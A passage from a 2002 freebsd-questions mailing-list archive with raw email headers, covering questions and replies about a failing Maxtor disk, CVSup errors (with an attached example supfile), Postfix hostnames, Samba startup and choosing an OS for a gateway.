135917743 of 29169720-29169723 (ad0s1 bn 135917743; cn 8460 tn 124 sn 31) status=59 error=40 I have never gotten this error before, is it the hard disk failing? if so why is it just one partition doing it? please respond to root@unixhideout.com as i am not on the list. Thanks. That's not a good sign. It's not unusual for HD problems to start on one partition. I would back up your drive and also check your cables for tightness. Beech Well i figured it wasn't a good sign. I tried "badsect" and it didnt do me much good. I just hate to toss a 60 gig drive in the trash. But now more blocks are just failing. This system has been running a year without any errors. When i bought the motherboard, i bought the "ABIT KT7A-RAID" for future plans, looks like the future is now. ill buy dual drives and raid it up. Now im only left with the decision of whether to buy yet *more* maxtor drives. It appears at least from my experience that the only hard drives that permanently die on me in what seems a short time is maxtor drives.. My seagate is still kicking like a champ. Any suggestions on what new brand i buy? =] And lastly thanks for your response. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 0:55:54 2002 Delivered-To: freebsd-questions@freebsd.org Received: from gate.uai.etel.ru (gate.uai.etel.ru [195.38.57.243]) by hub.freebsd.org (Postfix) with ESMTP id 0DBFE37B404 for ; Tue, 25 Jun 2002 00:55:31 -0700 (PDT) Received: by sendmail of gate.uai.etel.ru id g5P7tUF05941 for ; Tue, 25 Jun 2002 13:55:30 +0600 X-Authentication-Warning: gate.uai.etel.ru: smap set sender to using -f Received: from by gate.uai.etel.ru via smap (V2.1) id xma005672; Tue, 25 Jun 02 13:52:30 +0600 Received: by sendmail with ESMTP id g5P7qTxX011397 from vlad@telecom.ural.ru for ; Tue, 25 Jun 2002 13:52:29 +0600 Received: by sendmail id g5P7qTpA011396 for freebsd-questions@freebsd.org.KAV; Tue, 25 Jun 2002 13:52:29 +0600 Received: by sendmail with ESMTP id g5P7qSxX011384; Tue, 25 Jun 2002 13:52:28 +0600 Date: Tue, 25 Jun 2002 13:52:22 +0600 From: "Vladimir G. Drobyshevsky" X-Mailer: The Bat! (v1.60m) Reply-To: "Vladimir G. Drobyshevsky" Organization: Computer saloons "TelescOp" X-Priority: 3 (Normal) Message-ID: <314341572.20020625135222@telecom.ural.ru> To: Beech Rintoul Cc: freebsd-questions@freebsd.org Subject: Re[2]: CVSup didn't update sources - why? In-Reply-To: <20020625071636.1AE42204B5@yeoman.sinbad.net> References: <10710529530.20020625124902@telecom.ural.ru> <20020625071636.1AE42204B5@yeoman.sinbad.net> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----------2969482282E86" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ------------2969482282E86 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Tuesday, June 25, 2002, 1:16:35 PM, you wrote: BR> On Monday 24 June 2002 10:49 pm, you wrote: >> Hi! >> There is a problem exist on my system. CVSup wont cvsuping :) my >> local cvs-repository. >> There is a linsting below: >> >> Premature EOF from server >> Will retry at 12:24:49 >> Retrying >> ...and so on... >> >> That can it be? It works fine but after one moment it isn't. BR> Try changing your supfile to cvsup1.freebsd.org or cvsup3.freebsd.org, if BR> that doesn't work post /etc/cvsupfile. It's impossible to tell what the BR> problem is without looking at your configs. It isn't depend on cvs-server, I tried some before. And I think what my config cannot help, because it works before and it is edited version of example ;) but I include it in attache. I run cvs throe socks5 by runsocks /usr/local/bin/cvsup -g -L 2 -z /etc/cvs-supfile @M3novm Vl. ------------2969482282E86 Content-Type: application/octet-stream; name="cvs-supfile." Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="cvs-supfile." IyAkRnJlZUJTRDogc3JjL3NoYXJlL2V4YW1wbGVzL2N2c3VwL2N2cy1zdXBmaWxlLHYgMS4yNi4y LjYgMjAwMS8xMC8wMiAxMTo1NTowOCBydSBFeHAgJAojCiMgVGhpcyBmaWxlIGNvbnRhaW5zIGFs bCBvZiB0aGUgIkNWU3VwIGNvbGxlY3Rpb25zIiB0aGF0IG1ha2UgdXAgdGhlCiMgQ1ZTIGRldmVs b3BtZW50IHRyZWUgb2YgdGhlIEZyZWVCU0Qgc3lzdGVtLgojCiMgQ1ZTdXAgKENWUyBVcGRhdGUg UHJvdG9jb2wpIGFsbG93cyB5b3UgdG8gZG93bmxvYWQgdGhlIGxhdGVzdCBDVlMKIyB0cmVlIChv ciBhbnkgYnJhbmNoIG9mIGRldmVsb3BtZW50IHRoZXJlZnJvbSkgdG8geW91ciBzeXN0ZW0gZWFz aWx5CiMgYW5kIGVmZmljaWVudGx5IChmYXIgbW9yZSBzbyB0aGFuIHdpdGggc3VwLCB3aGljaCBD VlN1cCBpcyBhaW1lZAojIGF0IHJlcGxhY2luZykuICBJZiB5b3UncmUgcnVubmluZyBDVlN1cCBp bnRlcmFjdGl2ZWx5LCBhbmQgYXJlCiMgY3VycmVudGx5IHVzaW5nIGFuIFggZGlzcGxheSBzZXJ2 ZXIsIHlvdSBzaG91bGQgcnVuIENWU3VwIGFzIGZvbGxvd3MKIyB0byBrZWVwIHlvdXIgQ1ZTIHRy ZWUgdXAtdG8tZGF0ZToKIwojCWN2c3VwIGN2cy1zdXBmaWxlCiMKIyBJZiBub3QgcnVubmluZyBY LCBvciBpbnZva2luZyBjdnN1cCBmcm9tIGEgbm9uLWludGVyYWN0aXZlIHNjcmlwdCwgdGhlbgoj IHJ1biBpdCBhcyBmb2xsb3dzOgojCiMJY3ZzdXAgLWcgLUwgMiBjdnMtc3VwZmlsZQojCiMgWW91 IG1heSB3aXNoIHRvIGNoYW5nZSBzb21lIG9mIHRoZSBzZXR0aW5ncyBpbiB0aGlzIGZpbGUgdG8g YmV0dGVyCiMgc3VpdCB5b3VyIHN5c3RlbToKIwojIGhvc3Q9Q0hBTkdFX1RISVMuRnJlZUJTRC5v cmcKIwkJVGhpcyBzcGVjaWZpZXMgdGhlIHNlcnZlciBob3N0IHdoaWNoIHdpbGwgc3VwcGx5IHRo ZQojCQlmaWxlIHVwZGF0ZXMuICBZb3UgbXVzdCBjaGFuZ2UgaXQgdG8gb25lIG9mIHRoZSBDVlN1 cAojCQltaXJyb3Igc2l0ZXMgbGlzdGVkIGluIHRoZSBGcmVlQlNEIEhhbmRib29rIGF0CiMJCWh0 dHA6Ly93d3cuZnJlZWJzZC5vcmcvaGFuZGJvb2svbWlycm9ycy5odG1sLgojCQlZb3UgY2FuCW92 ZXJyaWRlIHRoaXMgc2V0dGluZyBvbiB0aGUgY29tbWFuZCBsaW5lCiMJCXdpdGggY3ZzdXAncyAi LWggaG9zdCIgb3B0aW9uLgojCiMgYmFzZT0vdXNyCiMJCVRoaXMgc3BlY2lmaWVzIHRoZSByb290 IHdoZXJlIENWU3VwIHdpbGwgc3RvcmUgaW5mb3JtYXRpb24KIwkJYWJvdXQgdGhlIGNvbGxlY3Rp b25zIHlvdSBoYXZlIHRyYW5zZmVycmVkIHRvIHlvdXIgc3lzdGVtLgojCQlBIHNldHRpbmcgb2Yg Ii91c3IiIHdpbGwgZ2VuZXJhdGUgdGhpcyBpbmZvcm1hdGlvbiBpbgojCQkvdXNyL3N1cC4gIEV2 ZW4gaWYgeW91IGFyZSBDVlN1cHBpbmcgYSBsYXJnZSBudW1iZXIgb2YKIwkJY29sbGVjdGlvbnMs IHlvdSB3aWxsIGJlIGhhcmQgcHJlc3NlZCB0byBnZW5lcmF0ZSBtb3JlIHRoYW4KIwkJfjFNQiBv ZiBkYXRhIGluIHRoaXMgZGlyZWN0b3J5LiAgWW91IGNhbiBvdmVycmlkZSB0aGUKIwkJImJhc2Ui IHNldHRpbmcgb24gdGhlIGNvbW1hbmQgbGluZSB3aXRoIGN2c3VwJ3MgIi1iIGJhc2UiCiMJCW9w dGlvbi4gIFRoaXMgZGlyZWN0b3J5IG11c3QgZXhpc3QgaW4gb3JkZXIgdG8gcnVuIENWU3VwLgoj CiMgcHJlZml4PS9ob21lL25jdnMKIwkJVGhpcyBzcGVjaWZpZXMgd2hlcmUgdG8gcGxhY2UgdGhl IHJlcXVlc3RlZCBmaWxlcy4gIEEKIwkJc2V0dGluZyBvZiAiL2hvbWUvbmN2cyIgd2lsbCBwbGFj ZSBhbGwgb2YgdGhlIGZpbGVzCiMJCXJlcXVlc3RlZCBpbiAvaG9tZS9uY3ZzIChlLmcuLCAiL2hv bWUvbmN2cy9zcmMvYmluIiwKIwkJIi9ob21lL25jdnMvcG9ydHMvYXJjaGl2ZXJzIikuICBUaGUg cHJlZml4IGRpcmVjdG9yeQojCQltdXN0IGV4aXN0IGluIG9yZGVyIHRvIHJ1biBDVlN1cC4KCiMg RGVmYXVsdHMgdGhhdCBhcHBseSB0byBhbGwgdGhlIGNvbGxlY3Rpb25zCiMKIyBJTVBPUlRBTlQ6 IENoYW5nZSB0aGUgbmV4dCBsaW5lIHRvIHVzZSBvbmUgb2YgdGhlIENWU3VwIG1pcnJvciBzaXRl cwojIGxpc3RlZCBhdCBodHRwOi8vd3d3LmZyZWVic2Qub3JnL2hhbmRib29rL21pcnJvcnMuaHRt bC4KKmRlZmF1bHQgaG9zdD1jdnN1cC5GcmVlQlNELm9yZwoqZGVmYXVsdCBiYXNlPS91c3IKKmRl ZmF1bHQgcHJlZml4PS9zdHVmZi9uY3ZzCipkZWZhdWx0IHJlbGVhc2U9Y3ZzCipkZWZhdWx0IGRl bGV0ZSB1c2UtcmVsLXN1ZmZpeAoKIyBJZiB5b3VyIG5ldHdvcmsgbGluayBpcyBhIFQxIG9yIGZh c3RlciwgY29tbWVudCBvdXQgdGhlIGZvbGxvd2luZyBsaW5lLgoqZGVmYXVsdCBjb21wcmVzcwoK IyMgTWFpbiBTb3VyY2UgVHJlZS4KIwojIFRoZSBlYXNpZXN0IHdheSB0byBnZXQgdGhlIG1haW4g c291cmNlIHRyZWUgaXMgdG8gdXNlIHRoZSAic3JjLWFsbCIKIyBtZWdhLWNvbGxlY3Rpb24uICBJ dCBpbmNsdWRlcyBhbGwgb2YgdGhlIGluZGl2aWR1YWwgInNyYy0qIiBjb2xsZWN0aW9ucy4Kc3Jj LWFsbAoKIyBUaGVzZSBhcmUgdGhlIGluZGl2aWR1YWwgY29sbGVjdGlvbnMgdGhhdCBtYWtlIHVw ICJzcmMtYWxsIi4gIElmIHlvdQojIHVzZSB0aGVzZSwgYmUgc3VyZSB0byBjb21tZW50IG91dCAi c3JjLWFsbCIgYWJvdmUuCiNzcmMtYmFzZQojc3JjLWJpbgojc3JjLWNvbnRyaWIKI3NyYy1ldGMK I3NyYy1nYW1lcwojc3JjLWdudQojc3JjLWluY2x1ZGUKI3NyYy1rZXJiZXJvczUKI3NyYy1rZXJi ZXJvc0lWCiNzcmMtbGliCiNzcmMtbGliZXhlYwojc3JjLXJlbGVhc2UKI3NyYy1zYmluCiNzcmMt c2hhcmUKI3NyYy1zeXMKI3NyYy10b29scwojc3JjLXVzcmJpbgojc3JjLXVzcnNiaW4KIyBUaGVz ZSBhcmUgdGhlIGluZGl2aWR1YWwgY29sbGVjdGlvbnMgdGhhdCBtYWtlIHVwIEZyZWVCU0QncyBj cnlwdG8KIyBjb2xsZWN0aW9uLiBUaGV5IGFyZSBubyBsb25nZXIgZXhwb3J0LXJlc3RyaWN0ZWQg YW5kIGFyZSBhIHBhcnQgb2YKIyBzcmMtYWxsCiNzcmMtY3J5cHRvCiNzcmMtZUJvbmVzCiNzcmMt c2VjdXJlCiNzcmMtc3lzLWNyeXB0bwoKIyMgUG9ydHMgQ29sbGVjdGlvbi4KIwojIFRoZSBlYXNp ZXN0IHdheSB0byBnZXQgdGhlIHBvcnRzIHRyZWUgaXMgdG8gdXNlIHRoZSAicG9ydHMtYWxsIgoj IG1lZ2EtY29sbGVjdGlvbi4gIEl0IGluY2x1ZGVzIGFsbCBvZiB0aGUgaW5kaXZpZHVhbCAicG9y dHMtKiIKIyBjb2xsZWN0aW9ucywKcG9ydHMtYWxsCgojIFRoZXNlIGFyZSB0aGUgaW5kaXZpZHVh bCBjb2xsZWN0aW9ucyB0aGF0IG1ha2UgdXAgInBvcnRzLWFsbCIuICBJZiB5b3UKIyB1c2UgdGhl c2UsIGJlIHN1cmUgdG8gY29tbWVudCBvdXQgInBvcnRzLWFsbCIgYWJvdmUuCiNwb3J0cy1hcmNo aXZlcnMKI3BvcnRzLWFzdHJvCiNwb3J0cy1hdWRpbwojcG9ydHMtYmFzZQojcG9ydHMtYmVuY2ht YXJrcwojcG9ydHMtYmlvbG9neQojcG9ydHMtY2FkCiNwb3J0cy1jaGluZXNlCiNwb3J0cy1jb21t cwojcG9ydHMtY29udmVydGVycwojcG9ydHMtZGF0YWJhc2VzCiNwb3J0cy1kZXNrdXRpbHMKI3Bv cnRzLWRldmVsCiNwb3J0cy1lZGl0b3JzCiNwb3J0cy1lbXVsYXRvcnMKI3BvcnRzLWZyZW5jaAoj cG9ydHMtZnRwCiNwb3J0cy1nYW1lcwojcG9ydHMtZ2VybWFuCiNwb3J0cy1ncmFwaGljcwojcG9y dHMtaGVicmV3CiNwb3J0cy1pcmMKI3BvcnRzLWphcGFuZXNlCiNwb3J0cy1qYXZhCiNwb3J0cy1r b3JlYW4KI3BvcnRzLWxhbmcKI3BvcnRzLW1haWwKI3BvcnRzLW1hdGgKI3BvcnRzLW1ib25lCiNw b3J0cy1taXNjCiNwb3J0cy1uZXQKI3BvcnRzLW5ld3MKI3BvcnRzLXBhbG0KI3BvcnRzLXBpY29i c2QKI3BvcnRzLXByaW50CiNwb3J0cy1ydXNzaWFuCiNwb3J0cy1zY2llbmNlCiNwb3J0cy1zZWN1 cml0eQojcG9ydHMtc2hlbGxzCiNwb3J0cy1zeXN1dGlscwojcG9ydHMtdGV4dHByb2MKI3BvcnRz LXVrcmFpbmlhbgojcG9ydHMtdmlldG5hbWVzZQojcG9ydHMtd3d3CiNwb3J0cy14MTEKI3BvcnRz LXgxMS1jbG9ja3MKI3BvcnRzLXgxMS1mbQojcG9ydHMteDExLWZvbnRzCiNwb3J0cy14MTEtc2Vy dmVycwojcG9ydHMteDExLXRvb2xraXRzCiNwb3J0cy14MTEtd20KCiMjIERvY3VtZW50YXRpb24K IwojIFRoZSBlYXNpZXN0IHdheSB0byBnZXQgdGhlIGRvYyB0cmVlIGlzIHRvIHVzZSB0aGUgImRv Yy1hbGwiCiMgbWVnYS1jb2xsZWN0aW9uLiAgSXQgaW5jbHVkZXMgYWxsIG9mIHRoZSBpbmRpdmlk dWFsICJkb2MtKiIKIyBjb2xsZWN0aW9ucywKZG9jLWFsbAoKZGlzdHJpYgo= ------------2969482282E86-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 1: 3:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from 217-126-145-95.uc.nombres.ttd.es (217-126-145-95.uc.nombres.ttd.es [217.126.145.95]) by hub.freebsd.org (Postfix) with ESMTP id B785837B4D6 for ; Tue, 25 Jun 2002 01:00:42 -0700 (PDT) Received: by unicorn.ea4els.ampr.org (Postfix, from userid 1001) id B01BA3204; Tue, 25 Jun 2002 10:00:38 +0200 (CEST) To: freebsd-questions@freebsd.org Subject: Re: freebsd && postfix References: <3D180DC8.2030403@gmx.net> From: Simon J Mudd Date: 25 Jun 2002 10:00:38 +0200 In-Reply-To: <3D180DC8.2030403@gmx.net> Message-ID: <86wusnzt21.fsf@unicorn.ea4els.ampr.org> Lines: 35 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG s.dale@gmx.net (Sunny Dale) writes: > hello people, > -i am running FreeBSD 4.4release with postfix-1.1.11. > -in main.cf i have set myhostname/mydomain/myorigin > -postconf -n shows me that all of those parameters are set correctly. > > still postfix seems to get *its hostname* from gethostname(). when i > do "hostname " suddenly it starts working. i'd prefer to set the > hostname in main.cf though. Wietse, the author, uses Postfix as his development platform. The symptoms you report appear to be rather strange. Perhaps it would help if you showed us. From postfix stopped: 1. the output of postconf -n 2. the output of postfix start (if this is how you start postfix) 3. the log entries which show that Postfix doesn't like/use the hostname in main.cf 4. you may need to enable debugging information in the part of Postfix which is failing (add a -v to the entry in /etc/postfix/master.cf) > ps. if this question is moron ignore it. The question appears strange but you not shown _any_ information to back up what you say, so the symptoms may be related to something else. Show us the output and perhaps we can determine what is happening. Simon -- Simon J Mudd, Tel: +34-91-408 4878, Mobile: +34-605-085 219 Madrid, Spain. email: sjmudd@pobox.com, Postfix RPM Packager To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 1: 5:59 2002 Delivered-To: freebsd-questions@freebsd.org Received: from marbles.lost.net.au (marbles.lost.net.au [203.87.95.130]) by hub.freebsd.org (Postfix) with ESMTP id 6B19037B4B8 for ; Tue, 25 Jun 2002 01:02:41 -0700 (PDT) Received: from localhost (tim@localhost) by marbles.lost.net.au (8.11.6/8.11.3) with ESMTP id g5P82eC90188; Tue, 25 Jun 2002 17:32:40 +0930 (CST) (envelope-from tim@lost.net.au) Date: Tue, 25 Jun 2002 17:32:40 +0930 (CST) From: tim peters To: "Wilkinson,Alex" Cc: freebsd-questions@FreeBSD.ORG Subject: Re: make fetch ? In-Reply-To: <20020625154208.A5834-100000@squirm.dsto.defence.gov.au> Message-ID: <20020625173150.S90159-100000@marbles.lost.net.au> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, Wilkinson,Alex wrote: W> Howdy all, W> W> Is it possible to force a "make fetch" when the required distfile is W> already compiled into the base system ? W> W> eg W> W> shell>sudo make fetch W> ===> bzip2-1.0.2 bzip2 is in the base system. W> shell> You could edit the Makefile in that directory and comment out the line beginning with "IGNORE=", then make fetch will work. -- tim@lost.net.au To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 1:10:58 2002 Delivered-To: freebsd-questions@freebsd.org Received: from linux.nu (port263.cvx3-mal.ppp.netlink.se [62.66.14.10]) by hub.freebsd.org (Postfix) with SMTP id A03CD37B6DE for ; Tue, 25 Jun 2002 01:06:52 -0700 (PDT) Received: (qmail 82736 invoked by uid 1022); 25 Jun 2002 08:07:24 -0000 Date: Tue, 25 Jun 2002 10:07:24 +0200 From: thrawn@linux.nu To: Gautham Ganapathy Cc: freebsd-questions@freebsd.org Subject: Re: TV-Card problem with sound Message-ID: <20020625100724.C78829@thrawn.birch.se> References: <3d16ccd9115fe1.32604773@not right> <032101c21b70$34638660$1901a8c0@ti.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <032101c21b70$34638660$1901a8c0@ti.com>; from gauthamg123list@myrealbox.com on Mon, Jun 24, 2002 at 04:43:44PM +0530 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, Thanks for the reply Well I have dsp0 and tuner0 and mixer0. But when I rm tuner0 in /dev and run MAKEDEV tuner0 i the this error: thrawn/dev# sh MAKEDEV tuner0 10:03AM [: er0: bad number thrawn/dev# But I have cat MAKEDEV | grep tuner and a ls -l tuner0 shows: crw-r--r-- 1 root wheel 92, 16 Jun 25 09:42 tuner0 So I can make the device myself but I can not run the MAKEDEV? What is your value of tuner0? Or have I missunderstand it, that tuner0 is sopose to be a link or something? Mvh Mattias Björk On Mon, Jun 24, 2002 at 04:43:44PM +0530, Gautham Ganapathy wrote: > On Monday, June 24, 2002 1:10 PM, Mattias Björk wrote: > > I have a terra tech value card, And it is working fine except > > the sound of it. So i wounder if anybody can help me fix this > > problem. Here is sysctl -a | grep bt: > > > > in the pixelview (bt878) that i have, the only direct link to my sound > card (es1371) was through a small stereo cable at the back. this would > connect the tuner to the line-in input in the sound card. so as long as > the line-in works, u should get sound. just check if /dev/dsp, tuner(i > think) and mixer are proper linked. in my system, they are linked to > dsp0, tuner0 and mixer0 > > > > > > > hw.bt848.card: -1 > > > > > > hw.bt848.tuner: -1 > > > > > > hw.bt848.reverse_mute: -1 > > > > > > hw.bt848.format: -1 > > > > > > hw.bt848.slow_msp_audio: -1 > > > > my sysctl also seems to be like this, if i remember correctly > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 1:12:56 2002 Delivered-To: freebsd-questions@freebsd.org Received: from desert.zssm.zp.ua (desert.zssm.zp.ua [212.8.32.5]) by hub.freebsd.org (Postfix) with ESMTP id C8D5837B7A3 for ; Tue, 25 Jun 2002 01:11:03 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by desert.zssm.zp.ua (8.11.3/8.11.3) with ESMTP id g5P86Ic82699; Tue, 25 Jun 2002 11:06:21 +0300 (EEST) (envelope-from stalker@hermes-comp.zp.ua) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id 1AFD438302; Tue, 25 Jun 2002 11:12:19 +0300 (EEST) Date: Tue, 25 Jun 2002 11:12:19 +0300 (EEST) From: Alexander V Zubchenko To: ro0t Cc: , Subject: RE: any idea what this means? In-Reply-To: Message-ID: <20020625111005.V1053-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings! I also can recommend Seagate. I've using _now_ two 1.2GB drives from them and i'm not first owner (of course) and i'm using them for couple of years and no problems. In fact, it was unexpected for me, as i thought no computer hardware can live so long:-) Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 On Tue, 25 Jun 2002, ro0t wrote: > On Monday 24 June 2002 11:13 pm, ro0t wrote: > > ad0s1d: hard error reading fsbn 135917743 of 29169720-29169723 (ad0s1 bn > 135917743; cn 8460 tn 124 sn 31) status=59 error=40 > I have never gotten this error before, is it the hard disk failing? if so > why is it just one partition doing it? please respond to > root@unixhideout.com as i am not on the list. Thanks. > > > That's not a good sign. It's not unusual for HD problems to start on one > partition. I would back up your drive and also check your cables for > tightness. > > Beech > > > Well i figured it wasn't a good sign. I tried "badsect" and it didnt do me > much good. I just hate to toss a 60 gig drive in the trash. But now more > blocks are just failing. This system has been running a year without any > errors. When i bought the motherboard, i bought the "ABIT KT7A-RAID" for > future plans, looks like the future is now. ill buy dual drives and raid it > up. Now im only left with the decision of whether to buy yet *more* maxtor > drives. It appears at least from my experience that the only hard drives > that permanently die on me in what seems a short time is maxtor drives.. My > seagate is still kicking like a champ. Any suggestions on what new brand i > buy? =] And lastly thanks for your response. > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 1:22:22 2002 Delivered-To: freebsd-questions@freebsd.org Received: from c015.snv.cp.net (h007.c015.snv.cp.net [209.228.35.122]) by hub.freebsd.org (Postfix) with SMTP id 471FD37BA6C for ; Tue, 25 Jun 2002 01:21:24 -0700 (PDT) Received: (cpmta 6623 invoked from network); 25 Jun 2002 01:21:23 -0700 Received: from 209.228.35.116 (HELO mail.compgeek.com.criticalpath.net) by smtp.compgeek.com (209.228.35.122) with SMTP; 25 Jun 2002 01:21:23 -0700 X-Sent: 25 Jun 2002 08:21:23 GMT Received: from [65.124.89.127] by mail.compgeek.com with HTTP; Tue, 25 Jun 2002 01:21:22 -0700 (PDT) Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 7bit MIME-Version: 1.0 To: pcasidy@casidy.com Cc: freebsd-questions@freebsd.org From: "Jon Noack" Subject: Re: Amount of FreeBSD servers is decreasing in servers statistics X-Sent-From: noackjr@compgeek.com Date: Tue, 25 Jun 2002 01:21:22 -0700 (PDT) X-Mailer: Web Mail 5.0.10-14 Message-Id: <20020625012123.300.h001.c015.wm@mail.compgeek.com.criticalpath.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Does anybody have a clue? Already been said, but I'd just like to echo that every FreeBSD box I've upgraded to 4.6 has shown up as unknown. New versions of OSs always seem to confuse detection programs. Another program that acts like this is nmap. Next version almost always detects it correctly, though. Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 1:24:58 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx0.gmx.net (mx0.gmx.net [213.165.64.100]) by hub.freebsd.org (Postfix) with SMTP id 5F9CE37B432 for ; Tue, 25 Jun 2002 01:24:51 -0700 (PDT) Received: (qmail 6599 invoked by uid 0); 25 Jun 2002 08:24:50 -0000 Date: Tue, 25 Jun 2002 10:24:50 +0200 (MEST) From: Sanjay Bhattacharya To: freebsd-questions@freebsd.org MIME-Version: 1.0 Subject: FreeBSD, Linux or Solaris X-Priority: 3 (Normal) X-Authenticated-Sender: #0014812425@gmx.net X-Authenticated-IP: [203.197.117.181] Message-ID: <17522.1024993490@www23.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi guys, I have a question for you. I am running a network consisting of an internal network of 30 clients running win9x boxes. I am running a DMZ which contains an email server, an web server, a dns server and a caching proxy server. My gateway box is connected to a cisco router which is connected to the net. My gateway box is also connected to the internal network and the dmz. The Win9x clients need access to the caching proxy, email server and dns. Now what kind of OS do you guys suggest for the box hosting the caching proxy server and the box hosting the gateway? Performance wise which'll give me the best: Linux, Solaris of FreeBSD? I thank you guys in advance. Regards, Sanjay -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 1:37: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx0.gmx.net (mx0.gmx.net [213.165.64.100]) by hub.freebsd.org (Postfix) with SMTP id 42D8D37B400 for ; Tue, 25 Jun 2002 01:36:57 -0700 (PDT) Received: (qmail 11374 invoked by uid 0); 25 Jun 2002 08:36:55 -0000 Date: Tue, 25 Jun 2002 10:36:55 +0200 (MEST) From: Sanjay Bhattacharya To: milan nankov Cc: freebsd-questions@freebsd.org MIME-Version: 1.0 References: <20020625070439.66209.qmail@web14405.mail.yahoo.com> Subject: Re: indetd.conf question X-Priority: 3 (Normal) X-Authenticated-Sender: #0014812425@gmx.net X-Authenticated-IP: [203.197.117.181] Message-ID: <17161.1024994215@www23.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG The best way to start SAMBA at boot is to put the startup lines in /usr/local/etc/rc.d/samba.sh (or whatever, but make sure it's executable) and not in inetd.conf. rgds, Sanjay > Hello, > > i have made my samba server to run at boot by add 2 > line to the inetd.conf but when the system boots the > error : "inetd[86]: netbios-ns/udp server failing > (looping), service terminated" shows > > these are my 2 lines > netbios-ssn stream tcp nowait smb > /usr/local/samba/sbin/smbd -D > > netbios-ns dgram udp nowait smb > /usr/local/samba/sbin/nmbd -D > > What's he problem ? > Thank you in advance. -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 1:37:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by hub.freebsd.org (Postfix) with SMTP id C1A0037B403 for ; Tue, 25 Jun 2002 01:37:24 -0700 (PDT) Received: (qmail 31851 invoked by uid 0); 25 Jun 2002 08:37:23 -0000 Received: from unknown (HELO gmx.net) (217.110.34.96) by mail.gmx.net (mp005-rz3) with SMTP; 25 Jun 2002 08:37:23 -0000 Message-ID: <3D182BC3.70801@gmx.net> Date: Tue, 25 Jun 2002 10:37:23 +0200 From: Sunny Dale User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020420 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Simon J Mudd Cc: freebsd-questions@freebsd.org 